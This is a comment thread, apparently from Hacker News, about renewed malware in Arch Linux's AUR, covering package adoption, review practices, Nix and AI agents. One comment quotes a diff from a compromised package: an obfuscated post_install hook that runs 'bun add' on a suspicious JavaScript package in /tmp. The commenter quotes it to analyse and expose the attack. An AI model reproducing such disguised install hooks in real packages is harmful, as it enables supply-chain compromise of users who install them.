Arch Linux AUR Hit by Another Wave of Now More Sophisticated Malware Attack
Comments
helterskelter
NekkoDroid
Not even that, AUR packages are just git repos, they don't auto update unless you use an AUR helper that does. You literally can just clone it and makepkg it and then pacman also tracks the installed files and uninstalling is a breeze.
DavideNL
Since Arch is hosting / facilitating the AUR on the archlinux.org domain, i think this causes less technical users to assume some level of trust. Even when they are aware that these are 3rd party packages.
Also i find it surprising that there's only very little/slow communication from Arch via their news channel. For example, how users can check for infections.
hollow-moe
Is the nixpkgs repo more "resilient" to these kind of attacks since an attacker would need the approval of a member with merge permission ?
schonfinkel
Kinda, you'd have to go through the whole review process and also get your stuff to successfully be part of (at least) an unstable build.
What really worries me is that on Nix we have a strong habit of patching packages to work around problems caused by the fact that NixOS doesn't use FHS. So, in theory, someone could submit an obscure patch to systemd and get everyone affected by it, if it through the approval process.
The solution so far has been a very rigorous process to even get a commit bit into nixpkgs: https://github.com/NixOS/nixpkgs-committers
Krutonium
Assuming you're not pulling in software from outside of nixpkgs, Yes.
skeledrew
I wouldn't be surprised if this is some kind of implicit "use AI or else" statement. I've been anticipating some kind of hit on Gentoo given their outspoken no-AI stance. Unsure of Arch's.
bfrog
I’m moving all my machines to NixOS. I’d done this before but ran into time constraints creating ports for convoluted binary software. With LLMs now as good as they are it’s quite possible this isn’t a problem anymore. I’ll be finding out.
ilioscio
I've had great results doing this, using flakes seem to make the results quite maintainable
Shank
Is there any information on if this is the same attack vector (orphaned packages that were adopted)? I believe they already locked down adoption, but maybe also a combination of existing maintainers being taken over?
cge
The reported commit [1] suggests to me that it was an account compromise of some sort, not orphan+adopt: the committer is the same in git, but the contact email changes in the PKGBUILD.
This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:
diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
new file mode 100644
index 000000000000..9806501accad
--- /dev/null
+++ b/htbrowser-bin-deps.install
@@ -0,0 +1,3 @@
+post_install() {
+ $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
+}
zootboy
I'm not certain that the git committer tells you the full story. I don't believe the AUR enforces that the git commit email is the same as the current maintainer email. So this could have been an orphan package, adopted by a malicious user, generated a malicious commit with the previous maintainer's git info.
Unfortunately, I don't see a way of viewing the ownership history of a package in the AUR. I know you get emails with ownership changes if you're subscribed to a package, but I don't see this info in the web interface anywhere.
7e
Companies like Anthropic and OpenAI need to sponsor open source projects by giving them free agent credits. Otherwise, bad actors can just outspend and totally overwhelm the somewhat dim and very overworked set of human maintainers. Humans in software are obsolete, full stop.
micaeked
Both already do that. The AUR stuff is more of a policy issue and unmatched expectations, unrelated to llms imo
thewebguyd
> The AUR stuff is more of a policy issue
Yes. This has happened before, a few times, before LLMs were even a thing. Via the same mechanism as well (someone else adopting an orphaned package). The big one I'm remembering was in 2018.
Outside of that mechanism though, anyone who uses the AUR regularly knowingly accepts this kind of risk. It's why I'm not a huge fan of distros (like Cachy, Endevaor, etc) that take Arch and package it up in a one-click easy installer with preinstalled AUR helpers. Cachy even uses the chaotic AUR too (auto build service for AUR packages to serve binaries). I like CachyOS, but good lord don't put in Yay + the AUR by default.
The ability for any registered user to just adopt an existing orphaned package is a problem (these attacks will always exist, but least force a fork & resubmission under a different name), and so is the use of automated AUR helpers that don't show PKGBUILD diffs.
The hygiene required to use the AUR is no different than the hygiene required to use pip, npm, cargo, etc. Anyone just blindly trusting user submitted packages and code from the internet is not operating with security in mind.
Adopt a policy of zero trust from any arbitrary code you download from the internet.
Krutonium
For what it's worth with regard to the Chaotic AUR, there's claims I've seen that they do vet packages updates going into it before they're actually built.
cyphar
Well, both give you 6 months of access. Out of interest I applied some time ago and (despite maintaining a few fairly important OSS projects) never got a response from them. Of the other maintainers I know, it seems to me that they decide who to give access to fairly randomly.
DANmode
Wonder how dependent it is on social following.
senectus1
lol
They're already running at a significant loss. giving out more free stuff isnt going to help.
What they really need to do is charge what it actually costs them. That will slow down the abuse a little.
Krutonium
That will also make it entirely unfeasible for anyone to use their services. The cost of the tokens you could burn on a $200 plan is in the neighborhood of $1200. They're getting users now and gambling on the cost of compute (or the difficulty of compute) dropping precipitously before they run out of cash.
Rekindle8090
[dead]
This is why I avoid AUR, it's too easy to become complacent. If I really want something from AUR I literally just look at the PKGBUILD for compilation instructions and do it manually by myself, but if it's got so many patches or dependencies that I can't go through them all by hand I just find another solution or do without.
This is also why I really dislike a lot of modern languages with automated fetching of dependencies. It really fosters a sloppy attitude toward your supply chain because it's just too damned convenient. With a reasonably sized Go project for instance, you may be pulling in code from dozens of different git repos. It only takes one compromised repo or malicious package to sink the ship.